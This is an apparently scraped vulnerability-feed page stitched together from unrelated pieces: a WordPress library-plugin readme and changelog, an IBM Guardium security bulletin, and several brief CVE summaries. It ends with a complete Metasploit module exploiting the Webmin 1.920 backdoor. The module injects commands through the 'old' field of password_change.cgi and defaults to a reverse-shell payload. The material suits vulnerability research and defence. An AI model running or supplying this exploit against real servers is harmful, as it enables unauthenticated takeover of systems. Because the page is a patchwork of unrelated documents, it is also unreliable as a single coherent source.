The weblibrarian plugin before 3.4.8.6 for WordPress has XSS via front-end short codes.

*   Details
*   Reviews
*   Installation
*   Development

This WordPress plugin started as a portable, cross-platform system that  
the Wendell Free Library could use as a transition system from its current  
paper card based circulation system to the system that will eventually  
be rolled out by the regional library system. It has ‘morphed’ to a  
web-based successor to Deepwoods Software’s Home Librarian 3 system.

This plugin implements a simple and basic, web-based, library catalog  
and circulation system. There are short codes that can be added to  
pages of a WordPress site to search and display items in the library  
collection. And there are back-end (admin) pages that implement  
management of the collection, management of patrons (users) of the  
library, as well as implementing the functionality of a circulation  
desk.

The plugin can be installed by uploading the Zip file to the plugin  
installer or unpacking the zip file under the plugins directory.

There are some options that can be set, but these options are not needed  
for basic operation. There are three short codes that can be added to  
pages or posts for front end searching and display of your library  
collection and there are a number of back-end (dashboard) pages for all  
of the management of your library.

Please read the PDF User Manual (also available in  
Italian) for complete documentation on using this plugin. This  
is a fairly non-trivial plugin, and there is not a simple quick-start guide  
for the impatient. The user manual files are 1548805 bytes long for the  
Italian version and 1548666 for the Englist version and MD5 sums are  
available. If you are having trouble opening the PDFs,  
please check the size and the MD5Sum. If the size is right and the MD5Sum is  
right, try another PDF viewer.

Support is handled either with \[Deepwoods Software’s Bugzilla\]\[bugreport\]  
(submit any bugs and feature requests to the Bugzilla) or though the  
\[Deepwoods Software’s Support page\]\[support\] (use this for comments or  
for general questions).

You’ve successfully installed the Web Librarian, but none of the admin  
menus (Patrons, Collection, Circulation Types, Circulation Desk, or  
Circulation Stats) show up. Why is this? This is because you are  
probably logged in as the web site administrator (your user role is  
Administrator). You need to create at least a user with a user role of  
Librarian and then log in as this user. Optionally, you can also  
create users with roles of Senior Aid or Volunteer, who have lesser  
privileges — these latter users make sense if you are a large enough  
library that has additional staff (“Senior Aid”) or uses additional  
workers (“Volunteer”) who man the circulation desk(s). It is important  
to read the subsection titled “User Role Setup” in the “Installation and  
basic setup” section _carefully_ and to be sure you understand it fully.

**Which stylesheet (CSS) selectors can I use to modify the appearance of the front end?**

This is described in the appendix of the user manual.

**I am having a problem with the bulk upload.**

Here are some tips relating to problems with bulk uploading a collection:

If you export a CSV file from Excel (and probably other ‘modern’ spreadsheet  
programs as well), you should check the resulting CSV file with a _plain text_  
editor. Things to look for include extra commas at the ends of lines  
(‘phantom’ or empty columns) and strange characters, partitularly in the  
headings and in barcodes (if you using your own barcodes).

Other issues involving issues with newline characters. Most of the time  
WordPress will be running on a LAMP server (a Linux machine). Linux uses the  
linefeed character (ASCII 10, Ctrl-j) as newline character. MS-Windows uses a  
two character sequence for newlines: carriage return (ASCII 13, Ctrl-m)  
followed by a linefeed (ASCII 10, Ctrl-j). MacOSX uses just a carriage  
return (ASCII 13, Ctrl-m). Web browsers are _supposed_ to normalize uploaded  
plain text files, but sometimes this does not happen. It might be necessary  
to fix things in advance of uploading.

Finally, try your upload in _small_ chunks, at least until you get the process  
worked out. Remember that most WordPress (PHP) installs have a limit on the  
maximum size of uploaded files, so a really large database is going to have be  
uploaded in chunks anyway.

**How do I check an item out?**

In order to check an item out, you need to load a patron record into the  
circulation desk page. You can use the “Find Patron” button to search the  
patrons by name and then select the proper result from the list of results  
in the drop down and then click the “Lookup Patron” to load that patron’s  
record. You can then enter the item’s barcode in the item barcode field and  
click the “Checkout” button. It is possible to pre-load the item barcode  
field before looking up the patron.

**Search does not work – sends me back to my home page**

This is caused by a conflict with permalinks and form handling. Answered in  
the support forum on the WordPress site:

https://wordpress.org/support/topic/search-doesnt-work-7

I’d suggest this solution:

Change your site’s permalink settings: on the dashboard select  
Settings->permalinks, then select something other than the ‘default’.

**I cannot open the user manual, it appears to be corrupt**

Please check the size of the PDF (1548805 for user\_manual\_IT.pdf and 1548666  
for user\_manual.pdf) and also check the MD5 sum to make  
sure you properly downloaded the file. The correct download urls are:

User Manual (English):  
https://plugins.svn.wordpress.org/weblibrarian/assets/user\_manual/user\_manual.pdf

User Manual (Italian):  
https://plugins.svn.wordpress.org/weblibrarian/assets/user\_manual/user\_manual\_IT.pdf

**Something does not work. What should I do?**

Submit a bug at \[Deepwoods Software’s Bugzilla\]\[bugreport\].

**I have another question that is not listed here. What should I do?**

Submit one on Deepwoods Software’s Support page. You can  
also submit a documentation bug at Deepwoods Software’s Bugzilla  
as well.

Dear Robert, Truly value your exertion in making this module. Good to run an online library. We have effectively setup and propelled a free online library for our group. Great work. We created a new theme on your work and its all thanks to your work. Web Librarian Much thanks 🙂

As a non-lending family history society, we wanted a plugin which would enable members to search the library catalogue and display results. We did not require the circulation side of it as we don't lend materials. We also wanted the ability to enter the category and subject so have added those to the database\_code\_php so that the librarian can select from each without having to retype every time. The librarian can export to a CSV file (already provided), and can now search the collection using Title, ISBN, Keyword, Call Number etc and sort on those headings as well. This has the bones of a good program for our needs and I had searched long and hard before downloading this one.

I tried loading this onto a subdomain site with the theme ‘Evolve'. Each time the plugin uploaded and activated, but soon as I added a library user the subdomain site and my main site froze. I had to delete the plugin in order to restore. Maybe this is a good plugin but not for me. I have no option but to look for an alternative.

Read all 12 reviews

“WebLibrarian” is open source software. The following people have contributed to this plugin.

Contributors

*    Robert Heller

**3.5.8.1**

Updated .pot file.

**3.5.8**

Minor bug fixes.

**3.5.7**

Fixed collection sorting.

**3.5.6**

Fixed missing ; in short\_codes.php.

**3.5.5**

Fix CVE-2019-1010034.

**3.5.4**

Add loading of base jQuery, in case the theme does not load it.

**3.5.3**

Perform length check and truncation in WEBLIB\_ItemInCollection::upload\_csv().

**3.5.2**

Removed extra dollar sign in database\_code.php.

**3.5.1**

Small bug — fix small edit error in WEBLIB\_AdminPages constructor.

**3.5**

Changed the localization slug from web-librarian to weblibrarian to conform  
with https://make.wordpress.org/meta/handbook/documentation/translations/

**3.4.8.7**

Fix yet another XSS problem in front end short codes.

**3.4.8.6**

Fix additional XSS problems in front end short codes.

**3.4.8.5**

Fix XSS problem in front end short codes.

**3.4.8.4**

Fix pubdate error in short codes.

**3.4.8.3**

Corrected ordering of fields in long format short code.

**3.4.8.2**

*   Make date display and entry in forms consistent.

**3.4.8.1**

*   Remove USA specific State check (required two letter state).

**3.4.8**

*   Relaxed the State, Zip, and Telephone fields of patrons to allow for non-USA users.

**3.4.7**

*   Fix small error handling code in WEBLIB\_Patrons\_Admin.php.

**3.4.6**

*   Changed to use PHP5 constructors in Widget classes (WP\_Widget).

**3.4.5**

*   Changed split() in includes/WEBLIB\_Patrons\_Admin.php to explode().

**3.4.4**

*   Added Czech language files.

**3.4.3**

*   Added Brazilian Portugese language module.

**3.4.2**

*   Minor bugfix for Patron Short Codes: removed unused functions and removed  
    references to undefined members (leftovers from copying ListTable code from  
    Admin land).

**3.4.1**

*   Added check for patron insertion falure.

**3.4**

*   Added short codes to put patron edit functions on the front side: editing  
    patron contact info along with hold and circs handling. This allows use with  
    plugins like WooCommerce that redirect away from the “normal” WP Admin  
    Dashboard.

**3.3**

*   Secure data export code: convert to use admin-post.php.
*   Secure AWS code: convert to use admin-post.php and admin-ajax.php
*   Move AJAX code to proper WP coding (using admin\_ajax.php).

**3.2.10.14**

*   Add ‘view\_admin\_dashboard’ cap. to Librarian, Senior Aid, and Volunteer, to allow usage with WooCommerce.

**3.2.10.13**

*   Fix minor error (wrong scope for WEBLIB\_Circulation\_Admin::single\_row\_columns()).

**3.2.10.12**

*   Add auto truncation of collection fields to prevent database errors.

**3.2.10.11**

*   Fix minor error (wrong scope for WEBLIB\_Circulation\_Admin::get\_column\_info()).

**3.2.10.10**

*   Fix minor error (unset variable).

**3.2.10.9**

*   Fix errors in cirlist code (fun with changed WP\_List api…).

**3.2.10.8**

*   Moved URL defines to the constructor. And updated tested to version.

**3.2.10.7**

*   Fix incrstring — MySQL uses case folded compares for unique string keys!

**3.2.10.6**

*   Add wildcards to username search in add patron id.

**3.2.10.5**

*   Fix small bug in Add Patron ID page: wrong page id in search form.

**3.2.10.4**

*   Minor stylesheet fix (#overdue => span.overdue).

**3.2.10.3**

*   Minor documentation update.

**3.2.10.1**

*   Handle Excel extra column stupidity.

**3.2.10**

*   Fix problems with generated barcodes during bulk uploads.

**3.2.9.9**

*   Include medium and large image in AWS item loopup and make them available for insertion

**3.2.9.8**

*   Fix bug in autobarcode generator code. (Stupid SQL ‘order by’!).

**3.2.9.7**

*   Updated AWS Locale endpoints.

**3.2.9.6**

*   Fix missing name attribute in short code.

**3.2.9.5**

*   Remove two small short tags.

**3.2.9.4**

*   Comment out ALL debug code (silly IIS).

**3.2.9.3**

*   Fix minor bug in patron admin code (wrong page name).

**3.2.9.2**

*   Workaround for missing localization function (nl\_langinfo()).
*   Fix missing localization function call (missing \_’s).

**3.2.9.1**

*   Fix typo in the readme.txt file.

**3.2.9**

*   Contextual help translated to Italian (completed).

**3.2.8.3**

*   Update when styles are enqueued.
*   Contextual help translated to Italian (in progress).

**3.2.8.2**

*   Updated readme: Fixed Changelog section (too many =’s!).  
    Added link for user manual (in English and Italian).
*   Updated user manual to include style sheet information for front side  
    styling.

**3.2.8.1**

*   Added hook to allow for localized contextual help.
*   Fixed minor localization bug.

**3.2.8**

*   Move user manual to assets.
*   Small fix to options page: allow for blank AWS options.

**3.2.7.7**

*   Front side update: minor short code updates.

**3.2.7.6**

*   Front side update: short codes and front style sheet updates.

**3.2.7.5**

*   Localization updates. Minor database update.

**3.2.7.4**

*   Localization updates, including localized date validation.

**3.2.7.3**

*   Localization updates.

**3.2.7.2**

*   Added missing style definition for weblib-item-table.

**3.2.7.1**

*   Changed default for publication date to 1900-01-01 to deal with possible  
    MySQL/PHP error on activation (out of range default for publication date).

**3.2.7**

*   Fixed up the jQuery UI, smoothed out the rough edges (eg got all of the  
    proper stylesheet and image support). Additional (minor) localization  
    updates.

**3.2.6.1**

*   Way too much fun with resizable iframes and jQuery: put the Amazon search  
    thingy in an iframe and put the iframe into a resizable (via jQuery) div.  
    sort of works, but still a little funky.
*   Fixed various minor typos: broken tags, spelling errors, missing  
    localizations.

**3.2.6**

*   Changed AWS insert buttons to be a small icon instead of “bulky” text buttons
*   Updated localization, added Italian translation.

**3.2.5.3**

*   Add insert / add buttons to Amazon item loopup. (Experimental!)

**3.2.5.2**

*   Remove roles on deactivate.
*   Make title the default on Amazon searches.

**3.2.5.1**

*   Move loading of Localization files to the correct place

**3.2.5**

*   Added missing contextual help page.
*   Fixed silly typo error in the collection bulk delete code.

**3.2.4**

*   Added code to collection and patron delete functions to clear out orphaned  
    holds and checkouts.
*   Added Collection Database Maintenance page, containing a button to clear out  
    orphaned holds and checkouts.

**3.2.3**

*   Updated the support/donation links (added localization).
*   Added an ‘About’ page.

**3.2.2**

*   Added donation buttons and links.
*   Updated localization.

**3.2.1**

*   Minor bug fix with Call Number column.

**3.2**

*   Added Call Number column to collection database.
*   Updated localization.

**3.1**

*   Minor documentation update for the contextual help for the options page.

**3.0**

*   Major code rewrite. All of the WP\_List\_Tables redone properly and  
    separated into separate source files. Adding the per\_page screen options  
    properly.  
    Added bulletproofing to the collection import code: barcodes are now checked  
    and fixed as they are added — no more ‘broken’ databases!

**2.6.3.2**

*   Various security fixes.

**2.6.3.1**

*   Include debugging code.

**2.6.3**

*   Fixed minor bug with telephone number validation when adding patrons.

**2.6.2**

*   Fixed database creation to deal with MS-Windows / MySQL weirdness  
    (no default allowed for BLOB/TEXT — error under MS-Windows, warning  
    under Linux).

**2.6.1**

*   Add localization to the JavaScript code

**2.6**

*   Add localization to the PHP code

**2.3**

*   Fixed a SQL syntax error.
*   Added ‘upload\_files’ capability to Librarian and SeniorAid roles (allows  
    them to upload images for items in the collection).
*   Fixed the scoping of variables in the JavaScript code.

**2.2.2**

*   Added something to the FAQ section.

**2.2.1**

*   Fixed a problem with the search form short code.

**2.2**

*   Fixed a problem with short PHP tags.

**2.1**

*   Updated to include the AssociateTag parameter required by Amazon.

**2.0**

*   Initial public release.

CVE-2017-18539: WebLibrarian

IBM Security Guardium Big Data Intelligence 4.0 (SonarG) does not properly restrict the size or amount of resources that are requested or influenced by an actor. This weakness can be used to consume more resources than intended. IBM X-Force ID: 161417.

  

**Summary**

IBM Security Guardium is aware of the following vulnerability

**Vulnerability Details**

**CVEID:** CVE-2019-4338  
**DESCRIPTION:** IBM Security Guardium Big Data Intelligence (SonarG) does not properly restrict the size or amount of resources that are requested or influenced by an actor. This weakness can be used to consume more resources than intended.  
CVSS Base Score: 7.5  
CVSS Temporal Score: See https://exchange.xforce.ibmcloud.com/vulnerabilities/161417 for the current score  
CVSS Environmental Score\*: Undefined  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**Affected Products and Versions**

**Affected IBM Security Guardium**

**Affected Versions**

IBM Security Guardium Big Data Intelligence

4.0

**Remediation/Fixes**

**References**

Off

**Acknowledgement**

IBM X-Force Ethical Hacking Team: Warren Moynihan, Jonathan Fitz-Gerald, John Zuccato, Rodney Ryan, Chris Shepherd, Dmitriy Beryoza, Matt McCarty, Vincent Dragnea, Troy Fisher, Nathan Roane

**Change History**

August 16, 2019: Original version published

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

Review the IBM security bulletin disclaimer and definitions regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.

**Internal Use Only**

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSUSHF","label":"IBM Security Guardium Big Data Intelligence"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"1.0","Edition":"","Line of Business":{"code":"LOB24","label":"Security Software"}}\]

CVE-2019-4338: Security Bulletin: IBM Security Guardium Big Data Intelligence is affected by a Denial of service vulnerability

The option-tree plugin before 2.5.4 for WordPress has XSS related to add_query_arg.

CVE-2015-9320: OptionTree

Live555 before 2019.08.16 has a Use-After-Free because GenericMediaServer::createNewClientSessionWithId can generate the same client session ID in succession, which is mishandled by the MPEG1or2 and Matroska file demultiplexors.

CVE-2019-15232

An issue was discovered in the Linux kernel before 5.2.8. There is a NULL pointer dereference caused by a malicious USB device in the sound/usb/helper.c (motu_microbookii) driver.

CVE-2019-15222

An issue was discovered in the Linux kernel before 5.0.14. There is a NULL pointer dereference caused by a malicious USB device in the drivers/usb/misc/yurex.c driver.

CVE-2019-15216

An issue was discovered in the Linux kernel before 5.1.8. There is a NULL pointer dereference caused by a malicious USB device in the drivers/media/usb/siano/smsusb.c driver.

CVE-2019-15218

An issue was discovered in the Linux kernel before 5.1.17. There is a NULL pointer dereference caused by a malicious USB device in the sound/usb/line6/pcm.c driver.

CVE-2019-15221

xtrlock through 2.10 does not block multitouch events. Consequently, an attacker at a locked screen can send input to (and thus control) various programs such as Chromium via events such as pan scrolling, "pinch and zoom" gestures, or even regular mouse clicks (by depressing the touchpad once and then clicking with a different finger).

CVE-2016-10894: #830726 - xtrlock: CVE-2016-10894: xtrlock does not block multitouch events

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

**Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)**

**Platform:****Linux**

**Date:****2019-08-12**

  

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Webmin 1.920 Unauthenticated RCE',
          'Description'        => %q{
            This module exploits a backdoor in Webmin versions 1.890 through 1.920.
            Only the SourceForge downloads were backdoored, but they are listed as
            official downloads on the project's site.
    
            Unknown attacker(s) inserted Perl qx statements into the build server's
            source code on two separate occasions: once in April 2018, introducing
            the backdoor in the 1.890 release, and in July 2018, reintroducing the
            backdoor in releases 1.900 through 1.920.
    
            Only version 1.890 is exploitable in the default install. Later affected
            versions require the expired password changing feature to be enabled.
          },
          'Author'         => [
            'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
          ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2019-'],
              ['URL', 'https://www.pentest.com.tr']
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Space'       => 512,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd'
                }
            },
          'DefaultOptions' =>
            {
              'RPORT' => 10000,
              'SSL'   => false,
              'PAYLOAD' => 'cmd/unix/reverse_python'
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [['Webmin <= 1.910', {}]],
          'DisclosureDate' => 'May 16 2019',
          'DefaultTarget'  => 0)
        )
        register_options [
            OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
        ]
      end
    
      def peer
        "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
      end
      ##
      # Target and input verification
      ##
      def check
        # check passwd change priv
        res = send_request_cgi({
          'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
        })
    
        if res && res.code == 200 && res.body =~ /Failed/
          res = send_request_cgi(
            {
            'method' => 'POST',
            'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
            'ctype'  => 'application/x-www-form-urlencoded',
            'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
            'headers' =>
              {
                'Referer' => "#{peer}/session_login.cgi"
              },
            'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
            })
    
          if res && res.code == 200 && res.body =~ /password_change.cgi/
            return CheckCode::Vulnerable
          else
            return CheckCode::Safe
          end
        else
          return CheckCode::Safe
        end
      end
    
      ##
      # Exploiting phase
      ##
      def exploit
    
        unless Exploit::CheckCode::Vulnerable == check
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
        end
    
        command = payload.encoded
        print_status("Attempting to execute the payload...")
        handler
        res = send_request_cgi(
          {
          'method' => 'POST',
          'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
          'ctype'  => 'application/x-www-form-urlencoded',
          'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
          })
    
      end
    end

Tag

#perl